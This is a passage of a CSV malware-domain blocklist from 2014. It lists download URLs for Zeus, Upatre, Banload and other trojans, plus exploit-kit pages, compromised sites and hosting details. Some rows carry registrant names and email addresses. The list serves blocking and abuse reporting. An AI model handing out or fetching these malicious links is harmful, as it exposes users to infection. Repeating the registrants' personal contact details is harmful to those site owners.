domainabuse@tucows.com","5396","0","IT", +"2014/02/18_15:40","www.notaverde.com/Invoice.zip","205.236.147.30","www2.securenet.net.","Trojan.Zbot","-","14112","0","CA", +"2014/02/19_01:05","directxex.com/uploads/841642867.johny.exe","108.162.198.96","-","TR/Ransom.243715","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/1769382244.HDPlayer_BETA_installer_v2.55.exe","108.162.198.96","-","MSIL/Injector.CSR trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/606454025.Download.exe","108.162.198.96","-","MSIL/Bladabindi.O trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/214894250.pics.rar","108.162.198.96","-","RAR/Agent.X trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/1483904659.photooamirat-annaba.exe","108.162.199.96","-","Win32/Injector.UJN trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/1844534592.avg.exe","108.162.199.96","-","Win32/Injector.AXIM trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","download-archiver.ru","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","downloads-finereader.ru","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","myvksaver.ru","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","winrar-soft.ru","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","download-archiver.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","downloads-finereader.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","myvksaver.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","winrar-soft.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","download-archiver.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_08:08","resolvethem.com","141.101.116.122","-","DOS service","Registrar Abuse Contact abuse@enom.com","13335","0","EU", +"2014/02/19_08:08","vitalityxray.com","5.135.127.68","-","Exploit","-","16276","0","FR", +"2014/02/19_08:08","fallencrafts.info","37.59.68.26","-","Multiple.Malware","WhoisGuard Protected / a2947cc98e68415b983f81ded9e98f3e.protect@whoisguard.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/3.exe","37.59.68.26","-","Win32/Injector.AXJG","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/xwmltc.exe","37.59.68.26","-","Win32/Injector.AXDN","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/pts.exe","37.59.68.26","-","Win32/BitCoinMiner.AU","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/ca.exe","37.59.68.26","-","Win32/TrojanDownloader.Wauchos.X","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/beef.tgz","37.59.68.26","-","multiple threats","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/x86.exe","37.59.68.26","-","Win32/BitCoinMiner.AU","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/wmltc.exe","37.59.68.26","-","Win32/CoinMiner.JG","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_11:23","ru.theswiftones.com/","178.33.152.221","-","exploit kit / requires Google referrer","-","16276","0","FR", +"2014/03/03_11:05","mgfd1b.petrix.net/5i9fh30/?2","64.202.123.2","server.fenixmediahosting.info.","exploit kit","Registrar Abuse Contact abuse@melbourneit.com.au","23352","0","US", +"2014/03/03_11:05","mgfd1b.petrix.net/5i9fh30/counter.php?fid=2","64.202.123.2","server.fenixmediahosting.info.","redirects to exploit kit","Registrar Abuse Contact abuse@melbourneit.com.au","23352","0","US", +"2014/02/21_05:43","mirandolasrl.it/inddex.html","194.209.228.109","orion.servicedomus.org.","Leads to Trojan.Zbot","-","3303","0","CH", +"2014/02/21_05:43","mirandolasrl.it/index.zip","194.209.228.109","orion.servicedomus.org.","Trojan.Zbot","-","3303","0","CH", +"2014/02/21_05:43","dianepiette.co.uk/inddex.html","87.117.220.252","server3.velnetweb.co.uk.","Leads to Trojan.Zbot","Diane Piette / -","20860","0","GB", +"2014/02/21_05:43","dianepiette.co.uk/index.zip","87.117.220.252","server3.velnetweb.co.uk.","Trojan.Zbot","Diane Piette / -","20860","0","GB", +"2014/02/21_05:43","www.seal-technicsag.ch/inddex.html","82.195.224.113","gic-web-bsd-013.genotec.ch.","Leads to Trojan.Zbot","-","1836","0","CH", +"2014/02/21_05:43","h1666015.stratoserver.net/inddex.html","85.214.157.217","h1666015.stratoserver.net.","Leads to Trojan.Zbot","Registrar Abuse Contact abuse@strato.de","6724","0","DE", +"2014/02/21_05:43","h1666015.stratoserver.net/inddex.html","85.214.157.217","h1666015.stratoserver.net.","Leads to Trojan.Zbot","Registrar Abuse Contact abuse@strato.de","6724","0","DE", +"2014/02/21_05:43","www.seal-technicsag.ch/inddex.html","82.195.224.113","gic-web-bsd-013.genotec.ch.","Leads to Trojan.Zbot","-","1836","0","CH", +"2014/02/21_05:43","plantaardigebrandstof.nl/inddex.html","5.200.7.36","server.ccchost6.nl.","Leads to Trojan.Zbot","-","49544","0","NL", +"2014/02/21_05:43","www.seal-technicsag.ch/index.zip","82.195.224.113","gic-web-bsd-013.genotec.ch.","Trojan.Zbot","-","1836","0","CH", +"2014/02/21_05:43","h1666015.stratoserver.net/index.zip","85.214.157.217","h1666015.stratoserver.net.","Trojan.Zbot","Registrar Abuse Contact abuse@strato.de","6724","0","DE", +"2014/02/21_05:43","h1666015.stratoserver.net/index.zip","85.214.157.217","h1666015.stratoserver.net.","Trojan.Zbot","Registrar Abuse Contact abuse@strato.de","6724","0","DE", +"2014/02/21_05:43","www.seal-technicsag.ch/index.zip","82.195.224.113","gic-web-bsd-013.genotec.ch.","Trojan.Zbot","-","1836","0","CH", +"2014/02/21_05:43","plantaardigebrandstof.nl/index.zip","5.200.7.36","server.ccchost6.nl.","Trojan.Zbot","-","49544","0","NL", +"2014/02/21_06:01","ama-alliance.com/inddex.html","198.23.48.162","hosted.by.liquidnetlimited.com.","Leads to Trojan.Zbot","Alison Hardin (choongsil@hughes.net)","32748","0","US", +"2014/02/21_06:01","faiyazahmed.com/inddex.html","74.220.207.177","host177.hostmonster.com.","Leads to Trojan.Zbot","Registrar Abuse Contact support@hostmonster.com","46606","0","US", +"2014/02/21_06:01","boschetto-hotel.gr/inddex.html","69.61.106.201","cerberus.impel.gr.","Leads to Trojan.Zbot","-","22653","0","US", +"2014/02/21_06:01","ama-alliance.com/index.zip","198.23.48.162","hosted.by.liquidnetlimited.com.","Trojan.Zbot","Alison Hardin (choongsil@hughes.net)","32748","0","US", +"2014/02/21_06:01","faiyazahmed.com/index.zip","74.220.207.177","host177.hostmonster.com.","Trojan.Zbot","Registrar Abuse Contact support@hostmonster.com","46606","0","US", +"2014/02/21_06:01","boschetto-hotel.gr/index.zip","69.61.106.201","cerberus.impel.gr.","Trojan.Zbot","-","22653","0","US", +"2014/02/21_07:00","nlconsulateorlandoorg.siteprotect.net/index.zip","64.71.35.58","-","Trojan.Zbot","Registrar Abuse Contact abuse@domainpeople.com","20401","0","US", +"2014/02/21_07:00","images.topguncustomz.com/index.zip","67.59.130.154","texashomeowner.org.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","20021","0","US", +"2014/02/21_07:00","nlconsulateorlandoorg.siteprotect.net/inddex.html","64.71.35.58","-","Leads to Trojan.Zbot","Registrar Abuse Contact abuse@domainpeople.com","20401","0","US", +"2014/02/21_07:00","images.topguncustomz.com/inddex.html","67.59.130.154","texashomeowner.org.","Leads to Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","20021","0","US", +"2014/02/21_08:54","www.acquisizionevideo.com/download-software-free.html/uploads/4/9/4/6/4946671/mp3mymp3install.exe","185.53.177.8","-","Trojan","Registrar Abuse Contact abuse@web.com","61969","0","DE", +"2014/02/25_12:51","-","142.0.79.184/agent/agent.php?cr=ila","-","leads to fake flashplayer","-","54444","0","US", +"2015/05/11_09:30","sgs.us.com/sU3P6pqaWwkJ/","23.253.130.80","server1.www.mc-solutions.com.","trojan","Registrar Abuse Contact abuse@tldregistrarsolutions.com","27357","0","US", +"2014/02/28_10:40","anshrit.com/images/m216.exe","103.8.127.189","server02.hostingraja.in.","Trojan.Injector","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18229","0","IN", +"2014/02/28_10:40","4dexports.com/images/wav1.exe","103.8.127.189","server02.hostingraja.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18229","0","IN", +"2014/02/28_10:40","bracbetul.com/images/sh-pdf.exe","103.8.127.189","server02.hostingraja.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18229","0","IN", +"2014/02/28_10:40","merrymilkfoods.com/wp-content/uploads/2014/01/wav.exe","103.8.127.205","server08.hostingraja.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18229","0","IN", +"2014/04/27_12:36","-","94.242.225.240/download/3a/W05YVFESKDU2M35qaSEnOykuP2MoLiMlfz49J3glLXY9PigCNCwPD10QEAdbVk4NAw9RWlldR0lCRUFHUBERFR8kFRlDDR27YA/voskresenie_-_kto_vinovat_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/04/27_12:36","-","94.242.225.240/download/3a/W05YVFESKDU2M35qaSEnOykuP2MoLiMlfz49J3glLXY9PigCNCwPD10QEAdbVk4NAw9RWlldR0lCS0dFUBERFR8kFRlDDR27YA/voskresenie_-_kto_vinovat_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/04/27_12:36","-","94.242.225.240/download/e5/hJODgYbHg5iZntXf3pSchpaThNafm4iI0JOWci9wditiY3NXY3lkYjJ9e3IsIzVwfHIqLy4oLCQpLCsUB0RKSEB5TkwUDR2/YA/voskresenie_-_po_doroge_razocharovaniy_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/04/27_12:36","powershopnet.net","82.194.66.169","vlc-143.dns-servicios.com.","Exploit","Julio Rosal / rosal@grupopowershop.com","16371","0","ES", +"2014/04/27_12:36","best100catfights.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","blackfalcon5.net","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","dancecourt.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","femalewrestlingnow.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","fetishfitnessbabes.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","fetishlocator.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","hotfacesitting.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","jeansvixens.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","oilwrestlingeurope.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","sexyoilwrestling.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/29_08:25","www.marss.eu/","95.110.133.212","host212-133-110-95.serverdedicati.aruba.it.","obfuscated Javascript leads to fake flash player site","NOT DISCLOSED! / technical@staff.aruba.it","31034","0","IT", +"2014/05/01_00:23","ocpersian.com","74.208.21.148","-","Android.Trojan.SMSStealer","Registrar Abuse Contact abuse@1and1.com","8560","0","US", +"2014/10/09_13:05","www.sasenergia.pt/images/highslide/highslide-with-gallery.js","176.221.32.120","pplc32120.ciberserver.com.","Compromised site leading to exploit","FILIPE CANEDO DA MOTA E SÁ / fsa@irmaossas.com","8426","0","PT", +"2014/09/16_09:59","optilogus.com/twmfizdfmu/lteqwxftti.html","192.185.17.123","-","Compromised site (Sage malspam campaign), leads to Upatre","Registrar Abuse Contact abuse@name.com","20013","0","US", +"2014/09/16_09:59","flashsavant.com/cqavunntfg/kuldytebws.html","74.91.152.2","2.webhosting.ecommerce.com.","Compromised site (Sage malspam campaign), leads to Upatre","-","32392","0","US", +"2014/09/16_09:59","becomedebtfree.com.au/ttlnlmwbox/ctinpfgeob.html","198.57.194.65","198-57-194-65.unifiedlayer.com.","Compromised site (Sage malspam campaign), leads to Upatre","Jarrod Sierocki / Visit whois.ausregistry.com.au for Web based WhoIs","46606","0","US", +"2014/09/16_09:59","unitex.home.pl/bbhdskxelc/wlqcwttani.html","79.96.42.136","v061604.home.net.pl.","Compromised site (Natwest malspam campaign), leads to Upatre","-","12824","0","PL", +"2014/09/16_09:59","becomedebtfree.com.au/zscczqbncu/nrrwalnlba.html","198.57.194.65","198-57-194-65.unifiedlayer.com.","Compromised site (Sage malspam campaign), leads to Upatre","Jarrod Sierocki / Visit whois.ausregistry.com.au for Web based WhoIs","46606","0","US", +"2014/09/16_09:59","hobbytotaalservice.nl/dspbhbslyt/twzokdiymd.html","85.17.155.23","hosted-by.leaseweb.com.","Compromised site (Natwest malspam campaign), leads to Upatre","-","16265","0","NL", +"2014/09/16_09:59","bnsoutlaws.co.uk/xzvltaqahm/hrbturjzuh.html","87.249.106.3","rev-3.106.249.87.virtu.nl.","Compromised site (Natwest malspam campaign), leads to Upatre","Andy Wallace / -","16243","0","NL", +"2014/09/16_09:59","bnsoutlaws.co.uk/vhwqpjheft/nlxclwfmym.html","87.249.106.3","rev-3.106.249.87.virtu.nl.","Compromised site (Natwest malspam campaign), leads to Upatre","Andy Wallace / -","16243","0","NL", +"2014/09/16_09:59","bnsoutlaws.co.uk/sadpwzhoww/durnmjxqyj.html","87.249.106.3","rev-3.106.249.87.virtu.nl.","Compromised site (Natwest malspam campaign), leads to Upatre","Andy Wallace / -","16243","0","NL", +"2014/09/16_09:59","artsconsortium.org/znquvoclmr/bamgrmqmgb.html","72.47.194.241","gumey.com.","Compromised site (Natwest malspam campaign), leads to Upatre","Michael Barcellos / michael@barcellosdesign.com","31815","0","US", +"2014/09/16_09:59","artsconsortium.org/wkqcisrgap/ahqjkywlsx.html","72.47.194.241","gumey.com.","Compromised site (Natwest malspam campaign), leads to Upatre","Michael Barcellos / michael@barcellosdesign.com","31815","0","US", +"2014/09/16_09:59","artsconsortium.org/lcrplilcal/irzdmndcby.html","72.47.194.241","gumey.com.","Compromised site (Natwest malspam campaign), leads to Upatre","Michael Barcellos / michael@barcellosdesign.com","31815","0","US", +"2014/09/16_09:59","-","162.210.70.17/uemfjtpigt/dgnkhubxnc.html","162.210.70-17.confluence-networks.com.","Compromised site (Natwest malspam campaign), leads to Upatre","-","40034","0","VG", +"2014/09/16_09:59","ambulanciaslazaro.com/nqwkgtzemx/yjfqpocron.html","149.62.168.210","inetworking.vservers.es.","Compromised site (Natwest malspam campaign), leads to Upatre","Registrar Abuse Contact domainabuse@tucows.com","12860","0","ES", +"2014/09/16_09:59","luchtenbergdecor.com.br/cythsfonuj/sijnkzotme.js","186.202.56.110","CPROHWIN0190.locaweb.com.br.","Compromised site (Natwest malspam campaign), leads to Upatre","VALDENIR TORRES E SILVA / valdenirtorres@ig.com.br","27715","0","BR", +"2014/09/16_09:59","ciclismovalenciano.com/wcxpcflvbj/ymkmcvpnkh.js","46.29.49.1","cloud1.hospedajeydominios.com.","Compromised site (Natwest malspam campaign), leads to Upatre","Registrar Abuse Contact abuse@enom.com","51718","0","ES", +"2014/09/16_09:59","pix360.co.nf/lgdjojxwuo/fofrkxuhgc.html","83.125.22.199","-","Compromised site (DHL malspam campaign), leads to Upatre","-","13237","0","EU", +"2014/09/16_09:59","isonomia.com.ar/mkyejphtxc/nsjkdqsmto.html","200.58.123.153","x094vm14.isonomia.com.ar.","Compromised site (DHL malspam campaign), leads to Upatre","-","27823","0","AR", +"2014/09/16_09:59","interactivearea.ru/kuxqihgvye/dbjyaszqcq.html","37.140.192.82","server51.hosting.reg.ru.","Compromised site (DHL malspam campaign), leads to Upatre","-","197695","0","RU", +"2014/09/16_09:59","okeanbg.com/lwpxofmvqz/jeslvdvjrt.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","okeanbg.com/jfydaalego/mimaefuenh.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","interactivearea.ru/tjnmfqjver/tswcsbafys.html","37.140.192.82","server51.hosting.reg.ru.","Compromised site (DHL malspam campaign), leads to Upatre","-","197695","0","RU", +"2014/09/16_09:59","www.advancesrl.eu/ryubfrytqb/dkdorvskxe.html","62.149.142.94","webx328.aruba.it.","Compromised site (DHL malspam campaign), leads to Upatre","NOT DISCLOSED! / technical@staff.aruba.it","31034","0","IT", +"2014/09/16_09:59","dimensionnail.ro/jfcwzdbvzq/ovgjelahsu.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","okeanbg.com/vcvzwsaybm/agptgouxot.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","www.advancesrl.eu/tjjyeqyfjz/gmiuxfhgsb.html","62.149.142.94","webx328.aruba.it.","Compromised site (DHL malspam campaign), leads to Upatre","NOT DISCLOSED! / technical@staff.aruba.it","31034","0","IT", +"2014/09/16_09:59","www.advancesrl.eu/ukhclcatkr/brcybmsute.html","62.149.142.94","webx328.aruba.it.","Compromised site (DHL malspam campaign), leads to Upatre","NOT DISCLOSED! / technical@staff.aruba.it","31034","0","IT", +"2014/09/16_09:59","dimensionnail.ro/qydmsiazxq/fdoyqfddox.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","dimensionnail.ro/ijaiqwgdcr/nxcubmnbyu.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","interactivearea.ru/rcaxfhtfnu/wghvxslkiv.html","37.140.192.82","server51.hosting.reg.ru.","Compromised site (DHL malspam campaign), leads to Upatre","-","197695","0","RU", +"2014/09/16_09:59","dimensionnail.ro/zgzjgmytap/jnreistghg.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","okeanbg.com/rjanequlla/nyxliupxyf.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","cosmetice-farduri.ro/puhmivlnki/gvddofpfpv.html","144.76.194.178","ns.icetechcopycenter.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","pix360.co.nf/wisnyrdqou/ltbwattpww.html","83.125.22.199","-","Compromised site (DHL malspam campaign), leads to Upatre","-","13237","0","EU", +"2014/09/16_09:59","interactivearea.ru/qbwfmjfuui/fbtvmwobxx.html","37.140.192.82","server51.hosting.reg.ru.","Compromised site (DHL malspam campaign), leads to Upatre","-","197695","0","RU", +"2014/09/16_09:59","isonomia.com.ar/vwyryztlkn/nsxiquronl.html","200.58.123.153","x094vm14.isonomia.com.ar.","Compromised site (DHL malspam campaign), leads to Upatre","-","27823","0","AR", +"2014/09/16_09:59","cosmetice-farduri.ro/modidoogrt/gjdotmqgzx.html","144.76.194.178","ns.icetechcopycenter.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","okeanbg.com/sshbuycplb/hbkfnidlfx.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","dimensionnail.ro/aqbfyipgkh/hjyxeiamcp.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","luchtenbergdecor.com.br/gcbelfuqbk/ygjbemlcsd.js","186.202.56.110","CPROHWIN0190.locaweb.com.br.","Compromised site (DHL malspam campaign), leads to Upatre","VALDENIR TORRES E SILVA / valdenirtorres@ig.com.br","27715","0","BR", +"2014/09/10_10:42","pepelacer.computingservices123.com/7b828d9fbn1vw/1/9ffbf35e4190fbba62f70c8477fa3964.html","176.58.111.253","li489-253.members.linode.com.","exploit kit","Registrar Abuse Contact abuse@web.com","15830","0","GB", +"2014/09/02_09:11","alsoknowsit.com/wp-files/config.bin","80.250.114.239","kvm.arconet.ee.","Zeus config file","-","39038","0","EE", +"2014/08/03_18:10","-","46.183.221.58/we/bot.exe","ip-221-58.dataclub.biz.","Trojan.Zbot","-","52048","0","LV", +"2014/08/03_18:10","-","46.183.221.58/snow/bot.exe","ip-221-58.dataclub.biz.","Trojan.Zbot","-","52048","0","LV", +"2014/07/30_23:56","coalimpex.com/web/boleto2.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/boleto.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/bg-02.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/receita-cliente1.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/receita-cliente.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/advocacia.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/bo_03.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/advocacia.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/bo_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/bo_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/hven_04.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/ch_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/hven_03.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/hven_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/hven_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/pe_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/re_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/pe_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/ad_04.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/ad_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/ad_03.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/ad_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/serasa/serasa_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/serasa/serasa_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/boleto2.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/boleto.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/bg-02.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/receita-cliente1.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/receita-cliente.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/advocacia.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/advocacia.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/bo_03.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/bo_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/bo_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/ch_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/hven_04.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/hven_03.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/hven_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", 